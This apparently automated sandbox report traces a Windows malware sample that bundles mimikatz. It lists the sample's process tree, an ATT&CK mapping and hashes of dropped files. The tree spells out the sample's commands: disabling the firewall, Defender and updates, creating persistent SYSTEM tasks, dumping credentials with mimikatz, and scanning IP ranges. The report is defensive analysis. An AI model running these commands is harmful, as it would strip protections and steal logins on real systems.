PID 2788 wrote to memory of 548	2788	bubpucp.exe	44
PID 2788 wrote to memory of 548	2788	bubpucp.exe	44
PID 2788 wrote to memory of 548	2788	bubpucp.exe	44
PID 2788 wrote to memory of 548	2788	bubpucp.exe	44
PID 2788 wrote to memory of 2880	2788	bubpucp.exe	46
PID 2788 wrote to memory of 2880	2788	bubpucp.exe	46
PID 2788 wrote to memory of 2880	2788	bubpucp.exe	46
PID 2788 wrote to memory of 2880	2788	bubpucp.exe	46
PID 2788 wrote to memory of 2396	2788	bubpucp.exe	65
PID 2788 wrote to memory of 2396	2788	bubpucp.exe	65
PID 2788 wrote to memory of 2396	2788	bubpucp.exe	65
PID 2788 wrote to memory of 2396	2788	bubpucp.exe	65
PID 2396 wrote to memory of 2488	2396	cmd.exe	63
PID 2396 wrote to memory of 2488	2396	cmd.exe	63
PID 2396 wrote to memory of 2488	2396	cmd.exe	63
PID 2396 wrote to memory of 2488	2396	cmd.exe	63
PID 2396 wrote to memory of 2488	2396	cmd.exe	63
PID 2396 wrote to memory of 2488	2396	cmd.exe	63
PID 2396 wrote to memory of 2488	2396	cmd.exe	63
PID 2488 wrote to memory of 1560	2488	wpcap.exe	117

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:916
- C:\Windows\TEMP\pcpntrnlq\bpgzsl.exe
  "C:\Windows\TEMP\pcpntrnlq\bpgzsl.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:448

C:\Users\Admin\AppData\Local\Temp\2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\jgebjtcb\bubpucp.exe
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2976
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:2644
- - C:\Windows\jgebjtcb\bubpucp.exe
    C:\Windows\jgebjtcb\bubpucp.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2700

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\drivers\etc\hosts /T /D users
1⤵
PID:2652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1⤵
PID:2764

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
1⤵
PID:2600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1⤵
PID:2664

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
1⤵
PID:2688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1⤵
PID:2808

C:\Windows\SysWOW64\cmd.exe
cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
1⤵
- Suspicious use of WriteProcessMemory
PID:2244

C:\Windows\jgebjtcb\bubpucp.exe
C:\Windows\jgebjtcb\bubpucp.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2788
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  PID:320
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  PID:548
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  PID:2880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:1244
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\lsyqbeqew\ylzbebeqp\wpcap.exe /S
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2396
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\lsyqbeqew\ylzbebeqp\znjiklplb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lsyqbeqew\ylzbebeqp\Scant.txt
  2⤵
  - Loads dropped DLL
  PID:588
- - C:\Windows\lsyqbeqew\ylzbebeqp\znjiklplb.exe
    C:\Windows\lsyqbeqew\ylzbebeqp\znjiklplb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lsyqbeqew\ylzbebeqp\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:1744
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Modifies data under HKEY_USERS
  PID:2108
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  PID:1188
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Modifies data under HKEY_USERS
  PID:1536
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:2312
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  PID:2576
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Modifies data under HKEY_USERS
  PID:292
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:2260
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Modifies data under HKEY_USERS
  PID:2628
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Modifies data under HKEY_USERS
  PID:1880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rzlqqlwwl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pcpntrnlq\bpgzsl.exe /p everyone:F"
  2⤵
  PID:932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "jtpiyqplb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jgebjtcb\bubpucp.exe /p everyone:F"
  2⤵
  PID:1676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "igebktzle" /ru system /tr "cmd /c C:\Windows\ime\bubpucp.exe"
  2⤵
  PID:1684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\lsyqbeqew\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lsyqbeqew\Corporate\log.txt
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:1980
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Modifies data under HKEY_USERS
  PID:2924
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Modifies data under HKEY_USERS
  PID:2772
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:2968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:2612
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:1660
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:1596
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Modifies data under HKEY_USERS
    PID:2856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:1244
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:1368
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:1492
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:2192
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:1768
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:2228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:1636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:2896
- C:\Windows\TEMP\lsyqbeqew\lunglbpll.exe
  C:\Windows\TEMP\lsyqbeqew\lunglbpll.exe -accepteula -mp 916 C:\Windows\TEMP\lsyqbeqew\916.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1816
- C:\Windows\TEMP\lsyqbeqew\lunglbpll.exe
  C:\Windows\TEMP\lsyqbeqew\lunglbpll.exe -accepteula -mp 1072 C:\Windows\TEMP\lsyqbeqew\1072.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:896
- C:\Windows\TEMP\lsyqbeqew\lunglbpll.exe
  C:\Windows\TEMP\lsyqbeqew\lunglbpll.exe -accepteula -mp 1116 C:\Windows\TEMP\lsyqbeqew\1116.dmp
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:628
- C:\Windows\TEMP\lsyqbeqew\lunglbpll.exe
  C:\Windows\TEMP\lsyqbeqew\lunglbpll.exe -accepteula -mp 2348 C:\Windows\TEMP\lsyqbeqew\2348.dmp
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1644
- C:\Windows\TEMP\lsyqbeqew\lunglbpll.exe
  C:\Windows\TEMP\lsyqbeqew\lunglbpll.exe -accepteula -mp 1180 C:\Windows\TEMP\lsyqbeqew\1180.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  PID:1404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\lsyqbeqew\ylzbebeqp\scan.bat
  2⤵
  - Loads dropped DLL
  PID:1884
- - C:\Windows\lsyqbeqew\ylzbebeqp\tnplbywcb.exe
    tnplbywcb.exe TCP 91.52.0.1 91.52.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:2980

C:\Windows\SysWOW64\net.exe
net stop "Boundary Meter"
1⤵
PID:1560
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop "Boundary Meter"
  2⤵
  PID:2116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop npf
1⤵
PID:2232

C:\Windows\SysWOW64\net.exe
net stop npf
1⤵
PID:2892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "TrueSight Meter"
1⤵
PID:2864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start npf
1⤵
PID:2076

C:\Windows\SysWOW64\net.exe
net start npf
1⤵
PID:2228
- C:\Windows\SysWOW64\sc.exe
  sc config WinDefend start= disabled
  2⤵
  - Launches sc.exe
  PID:592

C:\Windows\SysWOW64\net.exe
net stop "TrueSight Meter"
1⤵
PID:2848

C:\Windows\SysWOW64\net.exe
net start npf
1⤵
PID:2064
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 start npf
  2⤵
  PID:1936

C:\Windows\lsyqbeqew\ylzbebeqp\wpcap.exe
C:\Windows\lsyqbeqew\ylzbebeqp\wpcap.exe /S
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2488

C:\Windows\SysWOW64\net.exe
net start npf
1⤵
PID:604
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 start npf
  2⤵
  PID:600

C:\Windows\lsyqbeqew\Corporate\vfshost.exe
C:\Windows\lsyqbeqew\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1⤵
PID:1820

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "rzlqqlwwl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pcpntrnlq\bpgzsl.exe /p everyone:F"
1⤵
- Creates scheduled task(s)
PID:1052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1⤵
PID:568

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "igebktzle" /ru system /tr "cmd /c C:\Windows\ime\bubpucp.exe"
1⤵
- Creates scheduled task(s)
PID:2136

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "jtpiyqplb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jgebjtcb\bubpucp.exe /p everyone:F"
1⤵
- Creates scheduled task(s)
PID:1624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1⤵
PID:2456

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "297246066-1527184448-23490990100455652211990160219358978081250708556-1602155151"
1⤵
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2676

C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode mode=disable
1⤵
- Modifies Windows Firewall
PID:2640

C:\Windows\SysWOW64\net.exe
net stop SharedAccess
1⤵
PID:112
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop SharedAccess
  2⤵
  PID:1560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WinDefend
1⤵
PID:2908

C:\Windows\SysWOW64\sc.exe
sc config wuauserv start= disabled
1⤵
- Launches sc.exe
PID:1004

C:\Windows\SysWOW64\net.exe
net stop WinDefend
1⤵
PID:1932

C:\Windows\SysWOW64\rifzsk.exe
C:\Windows\SysWOW64\rifzsk.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MpsSvc
1⤵
PID:2400

C:\Windows\SysWOW64\net.exe
net stop MpsSvc
1⤵
PID:1996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-131954807216816181751804004450-675631532-4739744881046748134840259980-880860202"
1⤵
PID:2232

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:2456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
PID:1824

C:\Windows\system32\taskeng.exe
taskeng.exe {7CAB2EA5-1C12-408F-BA42-4A4B8DBCE7CB} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2784
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bubpucp.exe
  2⤵
  PID:2712
- - C:\Windows\ime\bubpucp.exe
    C:\Windows\ime\bubpucp.exe
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of SetWindowsHookEx
    PID:320
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jgebjtcb\bubpucp.exe /p everyone:F
  2⤵
  PID:1572
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pcpntrnlq\bpgzsl.exe /p everyone:F
  2⤵
  PID:2292
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bubpucp.exe
  2⤵
  PID:3692
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pcpntrnlq\bpgzsl.exe /p everyone:F
  2⤵
  PID:3248
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jgebjtcb\bubpucp.exe /p everyone:F
  2⤵
  PID:3760

C:\Windows\system32\cacls.exe
cacls C:\Windows\jgebjtcb\bubpucp.exe /p everyone:F
1⤵
PID:2624

C:\Windows\system32\cacls.exe
cacls C:\Windows\TEMP\pcpntrnlq\bpgzsl.exe /p everyone:F
1⤵
- Modifies data under HKEY_USERS
PID:2260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1⤵
PID:1036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1⤵
PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
PID:552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
PID:1064

C:\Windows\system32\cacls.exe
cacls C:\Windows\TEMP\pcpntrnlq\bpgzsl.exe /p everyone:F
1⤵
PID:2120

C:\Windows\ime\bubpucp.exe
C:\Windows\ime\bubpucp.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:3704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1⤵
PID:3344

C:\Windows\system32\cacls.exe
cacls C:\Windows\jgebjtcb\bubpucp.exe /p everyone:F
1⤵
PID:3780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1⤵
PID:3748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Network Service Discovery

T1046

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\IME\bubpucp.exe

Filesize
608KB

MD5
412704c2552811493e0f58d2c13213de

SHA1
1ad25f9abbecd7f7d9e7d4e964e5a88c908ebb3c

SHA256
53c26fa19d82d66e4da9396b506ebc7a1d6ef971ac54340cbe15e34692f5e981

SHA512
07ec828753ede92f40729ad9258dd61b6adf0d573823d93d2a799b2c6ecb1d5868f0055050e88692fa86fb3d167e51a8952269c59ef0989f52545cfe9678074f

Download Submit
C:\Windows\IME\bubpucp.exe

Filesize
8.2MB

MD5
5d443711f9f7da3c19c719ab1329f8d0

SHA1
0c183b8e6880c10c78d9c3fb6e97238315c72c67

SHA256
b6f9159b32a6cd181ccf4bd84c04c4e05b92c3ee4303309ecd7828f3643b8902

SHA512
2124110a12ccda3806f387197aa30f419e3d3882c08b194727155dfb0f80966174b7498236b071a9a1ad0f3bf58d8fe5d631a1553706c021fd055ce8a9bf42a8

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
11d9911306da5ab5f44104f3fc973f21

SHA1
47a33ea5e92971c2903dedf158473982491d1528

SHA256
01dcc9beb55493db7d568e44f0535b22449be3a6e04f3fd48615734a5d03e6cc

SHA512
9219eaa4bd46e7cd42ab0757c08e42b00fc0a05b23743142f0273653beece3d1b5986f7b267aaa1f0624732f4e821ab8251fbd90a061e13488bd58f589fa611c

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
6c52e05ec36502ab6528bb0cb1342a37

SHA1
7f5a5be3c24f375d76f1d9b6dc29fa1116063bf6

SHA256
b55abec932dff67531414b9d936e937802b6f1f1a01e3d58360cdaf2aa563830

SHA512
ea47eef9d0cfe1cb874e39ee778b7d942e6b7e5a29dd0137452cbfb6df45be40267c97b3956a3f59635ab03ca1e54f9ed7d294981451d670abea828088215440

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\lsyqbeqew\1072.dmp

Filesize
854KB

MD5
d134a37e3dc986eb89e30ca5becaad0b

SHA1
596547d6d5da965546ce86fa0c716642e9f84b8f

SHA256
b5aee9f8d8ee13bcc2c682f0be69c835bf02998f664136f7c09ee25f77610029

SHA512
5505c4bb29c6bd72f50fa1e6d85886924719b509bd30e653196591a66998536466bcc1fde511fd0b71e1911b206431c201b35a3d6e64e3287f47a8eacc54f637

Download Submit
C:\Windows\TEMP\lsyqbeqew\1116.dmp

Filesize
397KB

MD5
f33035964831b936005e239fb5212a0d

SHA1
240218329b98d6458bd453c9fe1ad28ffec904fa

SHA256
d0fa40c1a35e7ae35a7ed93fd7193a0dd7ae6b798cd57d10d1640168e6dbaaed

SHA512
20577eb7fcbb787a624f507007e8b5eff6b3aea19cfbc24a8f8fceb59c55d2ecd302bb7930f85b4c9992ef2fbdc10e45ac791a2180b9271bcadfb8027ba67fe1

Download Submit
C:\Windows\TEMP\lsyqbeqew\1180.dmp

Filesize
505KB

MD5
a41f6f4151ba90f8ed61abc3c6637c9b

SHA1
6640fc1c1248c8071db02d5fcabba49db8245dd2

SHA256
1423ca79061ab0e6856cc24f676051a77dafc9936a21693bbfd486f695529794

SHA512
56b4a0b6b286260a5bc56eb056e346a1b09cfc933be948b9e48c34cd5213fe54e46791beda1c32321f4f63d447f2289af09487d629625b8b2ce03eae50a644c3

Download Submit
C:\Windows\TEMP\lsyqbeqew\2348.dmp

Filesize
97KB

MD5
22ee4b0420bfd177429f37515b55c92c

SHA1
71e51b4d1add532e0514ef70fde1faaaade9391c

SHA256
0136cca6bdab17e15e05e1cfce96324e11a43477d5f634f95c43d3d2b9e34200

SHA512
7826efc9027bbd03dd7e0694a4fab0df7f807b75558c8a0ee9fd36937fe79d29494f688eb380f989b03026d36c5d620c2e0227002c1fe537ff8d67647b2c3039

Download Submit
C:\Windows\TEMP\lsyqbeqew\916.dmp

Filesize
161KB

MD5
6f217c721d3be8773e6c169a2035227d

SHA1
0633cd13ddc512fad03259738202b87955bb6c66

SHA256
5d41edd37f91b5db8e44ef2593c17471eb9eef87ebcba48c7dbf939137d0638d

SHA512
4cdc73bfd671130d140c125539ba11f835cba22103aacf75e15c36a13b180dec94f53b5a2706212db862ae2833eacaa12734af44f0cd6512a7fa389e5f0a42d9

Download Submit
C:\Windows\TEMP\pcpntrnlq\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\Temp\Tar98EA.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Windows\Temp\lsyqbeqew\lunglbpll.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\pcpntrnlq\bpgzsl.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
